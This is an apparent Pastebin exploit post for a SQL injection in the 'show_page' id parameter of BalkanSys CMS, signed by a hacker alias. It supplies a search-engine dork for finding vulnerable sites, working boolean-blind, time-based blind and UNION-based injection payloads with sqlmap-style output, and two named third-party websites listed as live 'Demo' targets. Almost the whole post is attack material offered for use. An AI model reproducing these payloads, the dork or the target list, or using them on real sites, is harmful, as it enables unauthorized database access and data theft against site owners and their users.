Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ######################
- # Exploit Title : BalkanSys CMS show_pageID SQL injection
- # Exploit Author : xBADGIRL21
- # Dork : inurl:/?act=show_page or inurl:/?act=show_page "Balkansys"
- # Category: [ Webapps ]
- # Tested on: [ Linux | Windows ]
- # Vendore : http://balkansys.com/
- # skype:xbadgirl21
- # Date: 2016/07/05
- # video Proof : https://youtu.be/pdLAMA2bBrQ
- ######################
- # PoC:
- # http://www.site.com/?act=show_page&id=[SQLi]
- ######################
- + test:=> http://www.site.com/?act=show_page&id=[76] INJECT HERE
- # respone:==>
- # [09:39:30] [INFO] GET parameter 'id' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' " injectable "
- # Parameter: id (GET)
- # Type: boolean-based blind
- # Title: AND boolean-based blind - WHERE or HAVING clause
- # Payload: act=show_page&id=76' AND 9301=9301 AND 'thUL'='thUL
- #
- # Type: AND/OR time-based blind
- # Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
- # Payload: act=show_page&id=76' AND (SELECT * FROM (SELECT(SLEEP(5)))oZvn) AND 'ysNR'='ysNR
- #
- # Type: UNION query
- # Title: Generic UNION query (NULL) - 19 columns
- # Payload: act=show_page&id=-8914' UNION ALL SELECT #NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171627671,0x4d4b6d63774a4d4e546c,0x717a786a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
- + Demo
- + http://optela.com/?act=show_page&id=76
- + http://saturaad.com/?act=show_page&id=165
- ######################
- # Discovered by : xBADGIRL21
- # Greetz : All Mauritanien Hackers - NoWhere
- #######################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement